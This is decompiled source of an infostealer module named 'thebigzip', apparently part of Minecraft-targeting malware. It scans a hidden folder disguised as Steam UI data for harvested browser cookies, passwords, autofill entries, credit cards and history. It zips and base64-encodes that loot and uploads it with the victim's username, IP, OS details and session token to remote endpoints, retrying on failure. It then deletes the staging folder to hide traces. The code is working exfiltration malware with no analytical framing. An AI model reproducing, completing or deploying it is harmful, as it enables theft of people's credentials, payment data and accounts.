                                object2 = new InputStreamReader((InputStream)bl2222222222, (Charset)object3);
                                int n = 8192;
                                bl2222222222 = object2 instanceof BufferedReader ? (BufferedReader)object2 : new BufferedReader((Reader)object2, n);
                                object3 = null;
                                try {
                                    BufferedReader it = (BufferedReader)bl2222222222;
                                    boolean bl4 = false;
                                    object2 = TextStreamsKt.readText((Reader)it);
                                    object = object2;
                                }
                                catch (Throwable throwable2) {
                                    object3 = throwable2;
                                    throw throwable2;
                                }
                                finally {
                                    CloseableKt.closeFinally((Closeable)bl2222222222, (Throwable)object3);
                                }
                            }
                            object = connection.getErrorStream();
                            if (object == null) break block46;
                            object2 = object;
                            Object object4 = Charsets.UTF_8;
                            Object object5 = new InputStreamReader((InputStream)object2, (Charset)object4);
                            int n = 8192;
                            object4 = object5 instanceof BufferedReader ? (BufferedReader)object5 : new BufferedReader((Reader)object5, n);
                            object5 = null;
                            try {
                                BufferedReader it = (BufferedReader)object4;
                                boolean bl5 = false;
                                String string2 = TextStreamsKt.readText((Reader)it);
                                string = string2;
                            }
                            catch (Throwable throwable3) {
                                object5 = throwable3;
                                throw throwable3;
                            }
                            finally {
                                CloseableKt.closeFinally((Closeable)object4, (Throwable)object5);
                            }
                            object = string;
                            if (string != null) break block47;
                        }
                        object = responseBody = "";
                    }
                    if (responseCode != 200) break block44;
                    this.logSuccess("Log sent successfully!");
                    this.logDebug("Server response: " + (String)responseBody);
                    bl2222222222 = true;
                    try {
                        connection.disconnect();
                    }
                    catch (Exception exception) {
                        // empty catch block
                    }
                    return bl2222222222;
                }
                thebigzip.logError$default(this, "Server returned error: " + responseCode + " - " + responseMessage, null, null, 6, null);
                thebigzip.logError$default(this, "Response body: " + (String)responseBody, null, null, 6, null);
                Pair[] bl2222222222 = new Pair[]{TuplesKt.to((Object)"responseCode", (Object)responseCode), TuplesKt.to((Object)"attempt", (Object)attempts)};
                this.sendErrorToEndpoint("Log upload failed with HTTP " + responseCode, (String)responseBody, "dpapi", "TheBigZip", MapsKt.mapOf((Pair[])bl2222222222));
                if (attempts >= maxAttempts) break block45;
                int waitTime = 2000 * attempts;
                this.logProgress("Waiting " + waitTime + "ms before retry...");
                Thread.sleep(waitTime);
            }
            try {
                connection.disconnect();
            }
            catch (Exception encrypted) {}
            continue;
            catch (Exception e) {
                thebigzip.logError$default(this, "Send attempt " + attempts + " failed", e, null, 4, null);
                if (attempts >= maxAttempts) continue;
                int waitTime = 2000 * attempts;
                this.logProgress("Waiting " + waitTime + "ms before retry...");
                try {
                    Thread.sleep(waitTime);
                }
                catch (InterruptedException ie) {
                    Thread.currentThread().interrupt();
                    try {
                        HttpURLConnection httpURLConnection = connection;
                        if (httpURLConnection != null) {
                            httpURLConnection.disconnect();
                        }
                    }
                    catch (Exception exception) {}
                    break;
                }
                try {
                }
                finally {
                    try {
                        HttpURLConnection httpURLConnection = connection;
                        if (httpURLConnection == null) continue;
                        httpURLConnection.disconnect();
                    }
                    catch (Exception exception) {}
                }
            }
        }
        thebigzip.logError$default(this, "Failed to send log after " + maxAttempts + " attempts", null, null, 6, null);
        return false;
    }

    private final Map<String, Integer> scanBrowserDataDirectory(File browserDataDir) {
        Pair[] pairArray = new Pair[]{TuplesKt.to((Object)"cookies", (Object)0), TuplesKt.to((Object)"passwords", (Object)0), TuplesKt.to((Object)"autofills", (Object)0), TuplesKt.to((Object)"cards", (Object)0), TuplesKt.to((Object)"history", (Object)0), TuplesKt.to((Object)"account_passwords", (Object)0)};
        Map stats = MapsKt.mutableMapOf((Pair[])pairArray);
        if (!browserDataDir.exists()) {
            this.logWarning("Browser data directory does not exist: " + browserDataDir.getAbsolutePath());
            return stats;
        }
        this.logProgress("Scanning browser data directory for stats...");
        File[] fileArray = browserDataDir.listFiles();
        if (fileArray != null) {
            File[] $this$forEach$iv = fileArray;
            boolean $i$f$forEach = false;
            int n = $this$forEach$iv.length;
            for (int i = 0; i < n; ++i) {
                File[] $this$forEach$iv2;
                File element$iv;
                File browserFolder = element$iv = $this$forEach$iv[i];
                boolean bl = false;
                if (!browserFolder.isDirectory()) continue;
                INSTANCE.logDebug("Scanning browser: " + browserFolder.getName());
                if (browserFolder.listFiles() == null) continue;
                boolean $i$f$forEach2 = false;
                int n2 = $this$forEach$iv2.length;
                for (int j = 0; j < n2; ++j) {
                    int lines;
                    File element$iv2;
                    File profileFolder = element$iv2 = $this$forEach$iv2[j];
                    boolean bl2 = false;
                    if (!profileFolder.isDirectory()) continue;
                    if (new File(profileFolder, "cookies.txt").exists()) {
                        lines = FilesKt.readLines$default((File)new File(profileFolder, "cookies.txt"), null, (int)1, null).size() - 3;
                        Object v = stats.get("cookies");
                        Intrinsics.checkNotNull(v);
                        stats.put("cookies", ((Number)v).intValue() + RangesKt.coerceAtLeast((int)lines, (int)0));
                    }
                    if (new File(profileFolder, "passwords.txt").exists()) {
                        lines = FilesKt.readLines$default((File)new File(profileFolder, "passwords.txt"), null, (int)1, null).size() / 6;
                        Object v = stats.get("passwords");
                        Intrinsics.checkNotNull(v);
                        stats.put("passwords", ((Number)v).intValue() + lines);
                    }
                    if (new File(profileFolder, "passwords_account.json").exists()) {
                        Object v = stats.get("account_passwords");
                        Intrinsics.checkNotNull(v);
                        stats.put("account_passwords", ((Number)v).intValue() + 1);
                    }
                    if (new File(profileFolder, "history.txt").exists()) {
                        lines = FilesKt.readLines$default((File)new File(profileFolder, "history.txt"), null, (int)1, null).size() / 6;
                        Object v = stats.get("history");
                        Intrinsics.checkNotNull(v);
                        stats.put("history", ((Number)v).intValue() + lines);
                    }
                    if (new File(profileFolder, "Misc/autofill.txt").exists()) {
                        lines = FilesKt.readLines$default((File)new File(profileFolder, "Misc/autofill.txt"), null, (int)1, null).size() / 5;
                        Object v = stats.get("autofills");
                        Intrinsics.checkNotNull(v);
                        stats.put("autofills", ((Number)v).intValue() + lines);
                    }
                    if (!new File(profileFolder, "credit_cards.txt").exists()) continue;
                    lines = FilesKt.readLines$default((File)new File(profileFolder, "credit_cards.txt"), null, (int)1, null).size() / 5;
                    Object v = stats.get("cards");
                    Intrinsics.checkNotNull(v);
                    stats.put("cards", ((Number)v).intValue() + lines);
                }
            }
        }
        this.logDebug("Scanned stats: " + stats);
        return stats;
    }

    public final void execute(@NotNull String username, @NotNull String desktopName, @NotNull String useruuid, @NotNull String uuid, @NotNull String ip, @NotNull String javaVersion, @NotNull String osName, @NotNull String ssidToken) {
        Intrinsics.checkNotNullParameter((Object)username, (String)"username");
        Intrinsics.checkNotNullParameter((Object)desktopName, (String)"desktopName");
        Intrinsics.checkNotNullParameter((Object)useruuid, (String)"useruuid");
        Intrinsics.checkNotNullParameter((Object)uuid, (String)"uuid");
        Intrinsics.checkNotNullParameter((Object)ip, (String)"ip");
        Intrinsics.checkNotNullParameter((Object)javaVersion, (String)"javaVersion");
        Intrinsics.checkNotNullParameter((Object)osName, (String)"osName");
        Intrinsics.checkNotNullParameter((Object)ssidToken, (String)"ssidToken");
        this.setupLogging();
        this.log(StringsKt.repeat((CharSequence)"=", (int)80));
        this.log("THEBIGZIP - Log Packaging and Upload");
        this.log(StringsKt.repeat((CharSequence)"=", (int)80));
        try {
            boolean bl;
            Map stats;
            String userProfile;
            File browserDataDir;
            block22: {
                if (Intrinsics.areEqual((Object)useruuid, (Object)"Unknown") || useruuid.length() < 16) {
                    thebigzip.logError$default(this, "Invalid useruuid: " + useruuid, null, null, 6, null);
                    this.sendErrorToEndpoint("Invalid useruuid", null, "dpapi", "TheBigZip", MapsKt.mapOf((Pair)TuplesKt.to((Object)"useruuid", (Object)useruuid)));
                    return;
                }
                String string = System.getenv("USERPROFILE");
                if (string == null) {
                    string = "C:\\Users\\Default";
                }
                if (!(browserDataDir = new File(userProfile = string, "AppData\\LocalLow\\Temp\\Steam\\Ui.012\\Browsers")).exists()) {
                    thebigzip.logError$default(this, "Browser data directory not found: " + browserDataDir.getAbsolutePath(), null, null, 6, null);
                    this.sendErrorToEndpoint("Browser data directory not found", null, "dpapi", "TheBigZip", MapsKt.mapOf((Pair)TuplesKt.to((Object)"path", (Object)browserDataDir.getAbsolutePath())));
                    return;
                }
                this.log("Browser data directory: " + browserDataDir.getAbsolutePath());
                int totalExtracted = Synpase.INSTANCE.getTotalExtracted();
                this.log("Total extracted items from this session: " + totalExtracted);
                Map<String, Integer> scannedStats = this.scanBrowserDataDirectory(browserDataDir);
                Pair[] pairArray = new Pair[10];
                Integer n = scannedStats.get("cookies");
                Intrinsics.checkNotNull((Object)n);
                pairArray[0] = TuplesKt.to((Object)"cookies", (Object)n);
                Integer n2 = scannedStats.get("passwords");
                Intrinsics.checkNotNull((Object)n2);
                pairArray[1] = TuplesKt.to((Object)"passwords", (Object)n2);
                Integer n3 = scannedStats.get("autofills");
                Intrinsics.checkNotNull((Object)n3);
                pairArray[2] = TuplesKt.to((Object)"autofills", (Object)n3);
                Integer n4 = scannedStats.get("cards");
                Intrinsics.checkNotNull((Object)n4);
                pairArray[3] = TuplesKt.to((Object)"cards", (Object)n4);
                Integer n5 = scannedStats.get("history");
                Intrinsics.checkNotNull((Object)n5);
                pairArray[4] = TuplesKt.to((Object)"history", (Object)n5);
                pairArray[5] = TuplesKt.to((Object)"discord", (Object)0);
                pairArray[6] = TuplesKt.to((Object)"games", (Object)0);
                pairArray[7] = TuplesKt.to((Object)"telegram", (Object)0);
                pairArray[8] = TuplesKt.to((Object)"minecraft", (Object)0);
                pairArray[9] = TuplesKt.to((Object)"wallets", (Object)0);
                stats = MapsKt.mapOf((Pair[])pairArray);
                this.log("Stats prepared (from browser data scan):");
                Map $this$forEach$iv = stats;
                boolean $i$f$forEach = false;
                Iterator iterator = $this$forEach$iv.entrySet().iterator();
                while (iterator.hasNext()) {
                    Map.Entry element$iv;
                    Map.Entry entry = element$iv = iterator.next();
                    boolean bl2 = false;
                    String key = (String)entry.getKey();
                    int value = ((Number)entry.getValue()).intValue();
                    INSTANCE.log("  " + key + ": " + value);
                }
                Iterable $this$all$iv = stats.values();
                boolean $i$f$all = false;
                if ($this$all$iv instanceof Collection && ((Collection)$this$all$iv).isEmpty()) {
                    bl = true;
                } else {
                    for (Map.Entry element$iv : $this$all$iv) {
                        int it = ((Number)((Object)element$iv)).intValue();
                        boolean bl3 = false;
                        if (it == 0) continue;
                        bl = false;
                        break block22;
                    }
                    bl = true;
                }
            }
            if (bl) {
                this.logWarning("No browser data found to upload");
                return;
            }
            File tempDir = new File(System.getProperty("java.io.tmpdir"), "thebigzip_" + UUID.randomUUID());
            tempDir.mkdirs();
            File zipFile = new File(tempDir, "browser_data.zip");
            this.logProgress("Creating zip archive...");
            boolean zipSuccess = this.createZipFile(browserDataDir, zipFile);
            if (!zipSuccess) {
                thebigzip.logError$default(this, "Failed to create zip file", null, null, 6, null);
                thebigzip.sendErrorToEndpoint$default(this, "Failed to create zip file", null, "dpapi", "TheBigZip", null, 16, null);
                return;
            }
            this.logProgress("Reading zip file...");
            byte[] zipBytes = FilesKt.readBytes((File)zipFile);
            String zipBase64 = Base64.getEncoder().encodeToString(zipBytes);
            this.logDebug("Zip base64 length: " + zipBase64.length() + " chars");
            this.logDebug("Zip file size: " + zipBytes.length + " bytes");
            this.logProgress("Creating log payload...");
            Intrinsics.checkNotNull((Object)zipBase64);
            String payload = this.createLogPayload(username, desktopName, useruuid, uuid, ip, javaVersion, osName, zipBase64, ssidToken, stats);
            boolean sendSuccess = this.sendLogToEndpoint(payload, zipFile);
            this.logProgress("Cleaning up temporary files...");
            try {
                zipFile.delete();
                tempDir.delete();
                this.logDebug("Temporary files cleaned up");
            }
            catch (Exception e) {
                this.logWarning("Failed to delete temporary files: " + e.getMessage());
            }
            if (sendSuccess) {
                this.logProgress("Cleaning up browser data directory...");
                try {
                    File browserDataDir2 = new File(userProfile, "AppData\\LocalLow\\Temp\\Steam\\Ui.012");
                    if (browserDataDir2.exists()) {
                        FilesKt.deleteRecursively((File)browserDataDir2);
                        File steamDir = new File(userProfile, "AppData\\LocalLow\\Temp\\Steam");
                        if (steamDir.exists()) {
                            String[] stringArray = steamDir.list();
                            boolean bl4 = stringArray != null ? stringArray.length == 0 : false;
                            if (bl4) {
                                steamDir.delete();
                            }
                        }
                    }
                }
                catch (Exception e) {
                    String string = e.getMessage();
                    if (string == null) {
                        string = "Unknown error";
                    }
                    thebigzip.sendErrorToEndpoint$default(this, "Failed to delete browser data", string, "dpapi", "TheBigZip", null, 16, null);
                }
            }
            if (sendSuccess) {
                int n = Synpase.INSTANCE.getTotalExtracted();
            } else {
                thebigzip.sendErrorToEndpoint$default(this, "Log upload failed after multiple attempts", null, "dpapi", "TheBigZip", null, 16, null);
            }
        }
        catch (Exception e) {
            thebigzip.sendErrorToEndpoint$default(this, "Fatal error in execution", ExceptionsKt.stackTraceToString((Throwable)e), "dpapi", "TheBigZip", null, 16, null);
        }
    }

    public static /* synthetic */ void execute$default(thebigzip thebigzip2, String string, String string2, String string3, String string4, String string5, String string6, String string7, String string8, int n, Object object) {
        if ((n & 1) != 0) {
            string = Skepta.INSTANCE.getCollectedUsername();
        }
        if ((n & 2) != 0) {
            string2 = Skepta.INSTANCE.getCollectedDesktopName();
        }
        if ((n & 4) != 0) {
            string3 = Skepta.INSTANCE.getCollectedUseruuid();
        }
        if ((n & 8) != 0) {
            string4 = Skepta.INSTANCE.getCollectedUuid();
        }
        if ((n & 0x10) != 0) {
            string5 = Skepta.INSTANCE.getCollectedIp();
        }
        if ((n & 0x20) != 0) {
            string6 = Skepta.INSTANCE.getCollectedJavaVersion();
        }
        if ((n & 0x40) != 0) {
            string7 = Skepta.INSTANCE.getCollectedOsName();
        }
        if ((n & 0x80) != 0) {
            string8 = Skepta.INSTANCE.getCollectedToken();
        }
        thebigzip2.execute(string, string2, string3, string4, string5, string6, string7, string8);
    }

    public final void test() {
        this.setupLogging();
        this.log(StringsKt.repeat((CharSequence)"=", (int)60));
        this.log("THEBIGZIP TEST MODE");
        this.log(StringsKt.repeat((CharSequence)"=", (int)60));
        this.log("Server URL: " + SERVER_URL);
        this.log("Log Endpoint: " + LOG_ENDPOINT);
        this.log("ABE Endpoint: " + ABE_ENDPOINT);
        this.log("DPAPI Endpoint: " + DPAPI_ENDPOINT);
        this.log("Error Endpoint: " + ERROR_ENDPOINT);
        this.log("User: " + USER_NAME + " (ohmygahuuid: " + OHMYGAHUUID + ")");
        String string = System.getenv("USERPROFILE");
        if (string == null) {
            string = "C:\\Users\\Default";
        }
        String userProfile = string;
        File browserDataDir = new File(userProfile, "AppData\\LocalLow\\Temp\\Steam\\Ui.012\\Browsers");
        this.log("Browser data directory: " + browserDataDir.getAbsolutePath());
        this.log("Directory exists: " + browserDataDir.exists());
        if (browserDataDir.exists()) {
            boolean bl;
            File[] files = browserDataDir.listFiles();
            this.log("Contents (" + (files != null ? files.length : 0) + " items):");
            if (files != null) {
                File[] $this$forEach$iv = files;
                boolean $i$f$forEach = false;
                int n = $this$forEach$iv.length;
                for (int i = 0; i < n; ++i) {
                    File[] $this$forEach$iv2;
                    File file;
                    File file2 = file = $this$forEach$iv[i];
                    bl = false;
                    INSTANCE.log("  " + (file2.isDirectory() ? "[DIR]" : "[FILE]") + " " + file2.getName());
                    if (!file2.isDirectory()) continue;
                    if (file2.listFiles() == null) continue;
                    boolean $i$f$forEach2 = false;
                    int n2 = $this$forEach$iv2.length;
                    for (int j = 0; j < n2; ++j) {
                        File element$iv2;
                        File subfile = element$iv2 = $this$forEach$iv2[j];
                        boolean bl2 = false;
                        INSTANCE.log("    " + (subfile.isDirectory() ? "[DIR]" : "[FILE]") + " " + subfile.getName());
                    }
                }
            }
            Map<String, Integer> stats = this.scanBrowserDataDirectory(browserDataDir);
            this.log("\nScanned stats:");
            Map<String, Integer> $this$forEach$iv = stats;
            boolean $i$f$forEach = false;
            Iterator<Map.Entry<String, Integer>> iterator = $this$forEach$iv.entrySet().iterator();
            while (iterator.hasNext()) {
                Map.Entry<String, Integer> entry;
                Map.Entry<String, Integer> entry2 = entry = iterator.next();
                bl = false;
                String key = entry2.getKey();
                int value = ((Number)entry2.getValue()).intValue();
                INSTANCE.log("  " + key + ": " + value);
            }
        }
        int totalExtracted = Synpase.INSTANCE.getTotalExtracted();
        this.log("Total extracted items in counter: " + totalExtracted);
        this.log("\nSkepta collected data:");
        this.log("  Username: " + Skepta.INSTANCE.getCollectedUsername());
        this.log("  UUID: " + Skepta.INSTANCE.getCollectedUuid());
        this.log("  useruuid: " + Skepta.INSTANCE.getCollectedUseruuid());
        this.log("  IP: " + Skepta.INSTANCE.getCollectedIp());
        this.log("  Java: " + Skepta.INSTANCE.getCollectedJavaVersion());
        this.log("  OS: " + Skepta.INSTANCE.getCollectedOsName());
        this.log("  Desktop: " + Skepta.INSTANCE.getCollectedDesktopName());
        this.log(StringsKt.repeat((CharSequence)"=", (int)60));
    }

    @Metadata(mv={2, 3, 0}, k=1, xi=48, d1={"\u0000\u0014\n\u0002\u0018\u0002\n\u0002\u0010\u0000\n\u0002\b\u0003\n\u0002\u0010\u000e\n\u0002\b\u0003\b\u00c2\u0002\u0018\u00002\u00020\u0001B\t\b\u0002\u00a2\u0006\u0004\b\u0002\u0010\u0003J\u0015\u0010\u0006\u001a\u00020\u00052\u0006\u0010\u0004\u001a\u00020\u0001\u00a2\u0006\u0004\b\u0006\u0010\u0007\u00a8\u0006\b"}, d2={"Lcom/synpase/thebigzip$JSON;", "", "<init>", "()V", "obj", "", "stringify", "(Ljava/lang/Object;)Ljava/lang/String;", "synpase"})
    private static final class JSON {
        @NotNull
        public static final JSON INSTANCE = new JSON();

        private JSON() {
        }

        @NotNull
        public final String stringify(@NotNull Object obj) {
            Intrinsics.checkNotNullParameter((Object)obj, (String)"obj");
            Object object = obj;
            return object instanceof Map ? CollectionsKt.joinToString$default((Iterable)((Map)obj).entrySet(), (CharSequence)",", (CharSequence)"{", (CharSequence)"}", (int)0, null, JSON::stringify$lambda$0, (int)24, null) : (object instanceof List ? CollectionsKt.joinToString$default((Iterable)((Iterable)obj), (CharSequence)",", (CharSequence)"[", (CharSequence)"]", (int)0, null, JSON::stringify$lambda$1, (int)24, null) : (object instanceof String ? "\"" + StringsKt.replace$default((String)((String)obj), (String)"\"", (String)"\\\"", (boolean)false, (int)4, null) + "\"" : (object instanceof Number ? obj.toString() : (object instanceof Boolean ? String.valueOf((Boolean)obj) : obj.toString()))));
        }

        private static final CharSequence stringify$lambda$0(Map.Entry entry) {
            Object v;
            Intrinsics.checkNotNullParameter((Object)entry, (String)"<destruct>");
            Object k = entry.getKey();
            Object v2 = v = entry.getValue();
            Intrinsics.checkNotNull(v2);
            return "\"" + k + "\":" + INSTANCE.stringify(v2);
        }

        private static final CharSequence stringify$lambda$1(Object it) {
            Object object = it;
            Intrinsics.checkNotNull((Object)object);
            return INSTANCE.stringify(object);
        }
    }
}

